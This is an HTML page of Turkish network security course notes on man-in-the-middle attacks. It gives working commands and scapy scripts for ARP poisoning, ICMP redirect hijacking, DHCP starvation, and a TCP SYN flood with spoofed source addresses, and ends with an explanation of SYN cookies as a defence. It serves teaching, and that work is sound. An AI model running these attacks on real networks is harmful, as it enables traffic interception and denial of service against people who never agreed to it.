<!DOCTYPE HTML>
<html lang="en" class="sidebar-visible no-js">
    <head>
        <!-- Book generated using mdBook -->
        <meta charset="UTF-8">
        <title>Ağ Güvenliği - MAOYYK2018</title>
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <meta name="description" content="Ağ Güvenliği ve Denetimi Kursu Notları">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="theme-color" content="#ffffff" />

        <link rel="shortcut icon" href="favicon.png">
        <link rel="stylesheet" href="css/variables.css">
        <link rel="stylesheet" href="css/general.css">
        <link rel="stylesheet" href="css/chrome.css">
        <link rel="stylesheet" href="css/print.css" media="print">

        <!-- Fonts -->
        <link rel="stylesheet" href="FontAwesome/css/font-awesome.css">
        <link href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" rel="stylesheet" type="text/css">
        <link href="https://fonts.googleapis.com/css?family=Source+Code+Pro:500" rel="stylesheet" type="text/css">

        <!-- Highlight.js Stylesheets -->
        <link rel="stylesheet" href="highlight.css">
        <link rel="stylesheet" href="tomorrow-night.css">
        <link rel="stylesheet" href="ayu-highlight.css">

        <!-- Custom theme stylesheets -->
        

        
    </head>
    <body class="light">
        <!-- Provide site root to javascript -->
        <script type="text/javascript">var path_to_root = "";</script>

        <!-- Work around some values being stored in localStorage wrapped in quotes -->
        <script type="text/javascript">
            try {
                var theme = localStorage.getItem('mdbook-theme');
                var sidebar = localStorage.getItem('mdbook-sidebar');

                if (theme.startsWith('"') && theme.endsWith('"')) {
                    localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
                }

                if (sidebar.startsWith('"') && sidebar.endsWith('"')) {
                    localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
                }
            } catch (e) { }
        </script>

        <!-- Set the theme before any content is loaded, prevents flash -->
        <script type="text/javascript">
            var theme;
            try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { } 
            if (theme === null || theme === undefined) { theme = 'light'; }
            document.body.className = theme;
            document.querySelector('html').className = theme + ' js';
        </script>

        <!-- Hide / unhide sidebar before it is displayed -->
        <script type="text/javascript">
            var html = document.querySelector('html');
            var sidebar = 'hidden';
            if (document.body.clientWidth >= 1080) {
                try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
                sidebar = sidebar || 'visible';
            }
            html.classList.remove('sidebar-visible');
            html.classList.add("sidebar-" + sidebar);
        </script>

        <nav id="sidebar" class="sidebar" aria-label="Table of contents">
            <ol class="chapter"><li class="affix"><a href="AgDenetimiveGuvenligi.html">Ağ Denetimi ve Güvenliği Giriş</a></li><li><a href="NetworkTemelleri.html"><strong aria-hidden="true">1.</strong> Ağ Temelleri</a></li><li><ol class="section"><li><a href="OSIKatmanlari.html"><strong aria-hidden="true">1.1.</strong> OSI Katmanları</a></li><li><a href="Subnet.html"><strong aria-hidden="true">1.2.</strong> Subnet (Alt Ağ)</a></li><li><a href="TcpIpProtokol.html"><strong aria-hidden="true">1.3.</strong> TCP/IP Protokol Kümesi</a></li><li><a href="TcpUdp.html"><strong aria-hidden="true">1.4.</strong> TCP/UDP</a></li><li><a href="DNS.html"><strong aria-hidden="true">1.5.</strong> DNS</a></li><li><a href="ICMPv4.html"><strong aria-hidden="true">1.6.</strong> ICMPv4</a></li><li><a href="ARP.html"><strong aria-hidden="true">1.7.</strong> ARP</a></li><li><a href="DHCP.html"><strong aria-hidden="true">1.8.</strong> DHCP</a></li></ol></li><li><a href="BilgiGuvenligi.html"><strong aria-hidden="true">2.</strong> Bilgi Güvenliği</a></li><li><ol class="section"><li><a href="OSINT.html"><strong aria-hidden="true">2.1.</strong> OSINT</a></li><li><a href="Aktif.html"><strong aria-hidden="true">2.2.</strong> Aktif Tarama</a></li><li><a href="AgGuvenligi.html" class="active"><strong aria-hidden="true">2.3.</strong> Ağ Güvenliği</a></li><li><a href="DNSZehirlenmesi.html"><strong aria-hidden="true">2.4.</strong> DNS Zehirlemesi</a></li><li><a href="Zafiyet.html"><strong aria-hidden="true">2.5.</strong> Zafiyet Tespiti</a></li><li><a href="CTF.html"><strong aria-hidden="true">2.6.</strong> CTF</a></li><li><a href="Kablosuz.html"><strong aria-hidden="true">2.7.</strong> Kablosuz Güvenliği</a></li></ol></li></ol>
        </nav>

        <div id="page-wrapper" class="page-wrapper">

            <div class="page">
                
                <div id="menu-bar" class="menu-bar">
                    <div id="menu-bar-sticky-container">
                        <div class="left-buttons">
                            <button id="sidebar-toggle" class="icon-button" type="button" title="Toggle Table of Contents" aria-label="Toggle Table of Contents" aria-controls="sidebar">
                                <i class="fa fa-bars"></i>
                            </button>
                            <button id="theme-toggle" class="icon-button" type="button" title="Change theme" aria-label="Change theme" aria-haspopup="true" aria-expanded="false" aria-controls="theme-list">
                                <i class="fa fa-paint-brush"></i>
                            </button>
                            <ul id="theme-list" class="theme-popup" aria-label="Themes" role="menu">
                                <li role="none"><button role="menuitem" class="theme" id="light">Light <span class="default">(default)</span></button></li>
                                <li role="none"><button role="menuitem" class="theme" id="rust">Rust</button></li>
                                <li role="none"><button role="menuitem" class="theme" id="coal">Coal</button></li>
                                <li role="none"><button role="menuitem" class="theme" id="navy">Navy</button></li>
                                <li role="none"><button role="menuitem" class="theme" id="ayu">Ayu</button></li>
                            </ul>
                            
                            <button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
                                <i class="fa fa-search"></i>
                            </button>
                            
                        </div>

                        <h1 class="menu-title">MAOYYK2018</h1> 

                        <div class="right-buttons">
                            <a href="print.html" title="Print this book" aria-label="Print this book">
                                <i id="print-button" class="fa fa-print"></i>
                            </a>
                        </div>
                    </div>
                </div>

                
                <div id="search-wrapper" class="hidden">
                    <form id="searchbar-outer" class="searchbar-outer">
                        <input type="search" name="search" id="searchbar" name="searchbar" placeholder="Search this book ..." aria-controls="searchresults-outer" aria-describedby="searchresults-header">
                    </form>
                    <div id="searchresults-outer" class="searchresults-outer hidden">
                        <div id="searchresults-header" class="searchresults-header"></div>
                        <ul id="searchresults">
                        </ul>
                    </div>
                </div>
                

                <!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
                <script type="text/javascript">
                    document.getElementById('sidebar-toggle').setAttribute('aria-expanded', sidebar === 'visible');
                    document.getElementById('sidebar').setAttribute('aria-hidden', sidebar !== 'visible');
                    Array.from(document.querySelectorAll('#sidebar a')).forEach(function(link) {
                        link.setAttribute('tabIndex', sidebar === 'visible' ? 0 : -1);
                    });
                </script>

                <div id="content" class="content">
                    <main>
                        <a class="header" href="#mitm-man-in-the-middle" id="mitm-man-in-the-middle"><h1>MITM (Man In The Middle)</h1></a>
<p>Bir ağ içerisindeki sistem kendi bağlantılarını başkası üzerinden geçiriyor ise
arada kalan sistem akan trafiği inceleyebilir. Bunu yapmaktaki amaç arada akan
trafiği incelemek veya farklı bir müdahalede bulunmak. Örnek olarak iki farklı
yöntem vardır.</p>
<ul>
<li>DHCP</li>
<li>ARP</li>
<li>Layer 3 (ICMP)</li>
<li>TCP</li>
</ul>
<a class="header" href="#arp" id="arp"><h2>ARP</h2></a>
<p><strong>[!] Bunu yapabilmek için Arp Adresleriyle oynamak daha kolay olduğu için DHCP
serverini indirmek yerine <a href="ARP.html">ARP</a> konusunda yaptığımız gibi mac
adreslerini değiştirmeliyiz.</strong></p>
<pre><code>echo 1 &gt; /proc/sys/net/ipv4/ip_forward # Routing Özelliğini Açar
arpspoof -c both -t 1.1.1.1 -r 2.2.2.2 # Router ve Hedef Sistemin Arp Tablosunu Zehirler
</code></pre>
<p>Veya scapy kullanmak istersek.</p>
<pre><code>ethBaslik = Ether(dst=&quot;00:0c:29:fe:7b:ea&quot;,src=&quot;00:0c:29:14:3c:c9&quot;)
ARPBaslik = ARP(op=1, hwsrc=&quot;00:0c:29:fe:7b:ea&quot;,psrc=&quot;1.1.1.1&quot;,pdst=&quot;2.2.2.2&quot;)
sendp(ethBaslik/ARPBaslik)
</code></pre>
<a class="header" href="#icmp" id="icmp"><h2>ICMP</h2></a>
<p>ICMP Redirect paketi kullanarak trafiğin akışı değiştirilebilir.</p>
<p>Kurban sisteme icmp redirect paketi kaynak olarak router gösterilerek router
olarak kendi adresimizi gönderirsek eğer giden paketleri yakalayabiliriz.
Buradaki sıkıntı paketin içinde source kısmı kurban sistem olduğu için router
gelen paketi saldırgana göndermez. Gelen paketi yakalayabilmek için TCP paketi
içerisindeki source kısmını kurban ip yerine saldırganın ip adresini yapılmalı
ki router gelen cevabı saldırgana gönderebilsin.</p>
<pre><code>#!/bin/python2.7
from scapy.all import *

originalRouterIP=''
attackerIP=''
victimIP=''
serverIP=''

# Here we create an ICMP Redirect packet
ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP

# The ICMP packet payload /should/ :) contain the original TCP SYN packet
# sent from the victimIP
redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP
fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags=&quot;S&quot;
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555

# Release the Kraken!
while True:
send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
</code></pre>
<p>Paket Kurbandan adresinden çıkarken kaynak kısmını değiştirmek için iptables
kullanılabilir.</p>
<pre><code>iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
</code></pre>
<a class="header" href="#dhcp" id="dhcp"><h2>DHCP</h2></a>
<p><strong>DHCP servisini indirip</strong> kendi dhcp servisimizi başlatarak gateway adresini
değiştirerek bunu başarabiliriz.</p>
<p>İlk olarak DHCP sunucusundaki havuzu doldurmak (DHCP-Starve)</p>
<pre><code>$ scapy
for i in range(2,255):
    mac = str(RandMAC())
    dhcpServerID=&quot;192.168.255.51&quot;
    eth = Ether(dst=&quot;ff:ff:ff:ff:ff:ff&quot;,src=mac)
    ip  = IP(src=&quot;0.0.0.0&quot;,dst=&quot;255.255.255.255&quot;)
    ud  = UDP(sport=68,dport=67)
    bootp = BOOTP(chaddr=mac)
    dhcp = DHCP(options = [ (&quot;message-type&quot;,&quot;request&quot;),(&quot;requested_addr&quot;,&quot;192.168.255.&quot;+str(i)),(&quot;server_id&quot;,dhcpServerID),&quot;end&quot;])
    sendp(eth/ip/ud/bootp/dhcp)
</code></pre>
<p>daha sonra bir dhcp sunucusunu ayağa kaldırıp broadcastte dhcp keşfi aryan
makinalara ip adresini vererek trafiği inceleyebiliriz. DHCP server olarak
<strong>dnsmasq</strong> örnek verilebilir.</p>
<a class="header" href="#tcp" id="tcp"><h2>TCP</h2></a>
<p>TCP/Dos saldırısı TCP/SYN paketinin kaynak ip ve port bilgilerini değiştirerek
gönderebilir. Servise yönelik yapılacağı zaman daha etkilidir.</p>
<p>Scapy kullanarak şu şekilde yapılabilir:</p>
<pre><code>$ scapy
ip = IP(src=RandIP(),dst=&quot;0.0.0.0&quot;)
tcp = TCP(sport=RandShort(),dport=80,flags=&quot;S&quot;)
paket = ip/tcp
send(paket,loop=1)
</code></pre>
<p>mz adlı aracı kullanmak istersek:</p>
<pre><code>mz -B &gt;ip&lt; -t tcp &quot;sp=1-65535,dp=80,flags=syn&quot; -c 0
</code></pre>
<hr />
<a class="header" href="#syncookie" id="syncookie"><h3>SynCookie</h3></a>
<p>Sunucu ilk açıldığında rastgele bir sayı üretilir ve bu <strong>X</strong> sayısı kaynak ip,
kaynak port ve hedef port ile toplanır. Sunucuya gelen SYN+ACK requestinde
gelende seq numarasını bir azaltıp geriye doğru kontrol eder. Bu sayede
sunucudaki tablonun doldurulması engellenebilir.</p>
<pre><code>---SYN---&gt;
&lt;--SYN-ACK- # sequenceNumarası = KaynakIP + KaynakPort + HedefPort + X
---ACK---&gt;  # Burda Client acknowledgeNumarasına sequenceNumarası+1 yazmalı
</code></pre>
<p>Yukarıdaki gibi bir 3 way handshake işleminde, Sunucu tarafında gelen
acknowledge kısmını bir azaltıp adresleri kontrol ederek oturumun başarılı bir
şekilde devam ettiğini daha az masrafla tablo kullanmadan anlayabilir.</p>
<p><strong>[!] Ubuntu Serverda bu özellik varsayılan olarak aktiftir.</strong></p>

                    </main>

                    <nav class="nav-wrapper" aria-label="Page navigation">
                        <!-- Mobile navigation buttons -->
                        
                            <a rel="prev" href="Aktif.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
                                <i class="fa fa-angle-left"></i>
                            </a>
                        

                        
                            <a rel="next" href="DNSZehirlenmesi.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                                <i class="fa fa-angle-right"></i>
                            </a>
                        

                        <div style="clear: both"></div>
                    </nav>
                </div>
            </div>

            <nav class="nav-wide-wrapper" aria-label="Page navigation">
                
                    <a href="Aktif.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
                        <i class="fa fa-angle-left"></i>
                    </a>
                

                
                    <a href="DNSZehirlenmesi.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
                        <i class="fa fa-angle-right"></i>
                    </a>
                
            </nav>

        </div>

        

        

        

        
        <script src="elasticlunr.min.js" type="text/javascript" charset="utf-8"></script>
        <script src="mark.min.js" type="text/javascript" charset="utf-8"></script>
        <script src="searcher.js" type="text/javascript" charset="utf-8"></script>
        

        <script src="clipboard.min.js" type="text/javascript" charset="utf-8"></script>
        <script src="highlight.js" type="text/javascript" charset="utf-8"></script>
        <script src="book.js" type="text/javascript" charset="utf-8"></script>

        <!-- Custom JS scripts -->
        

        

    </body>
</html>
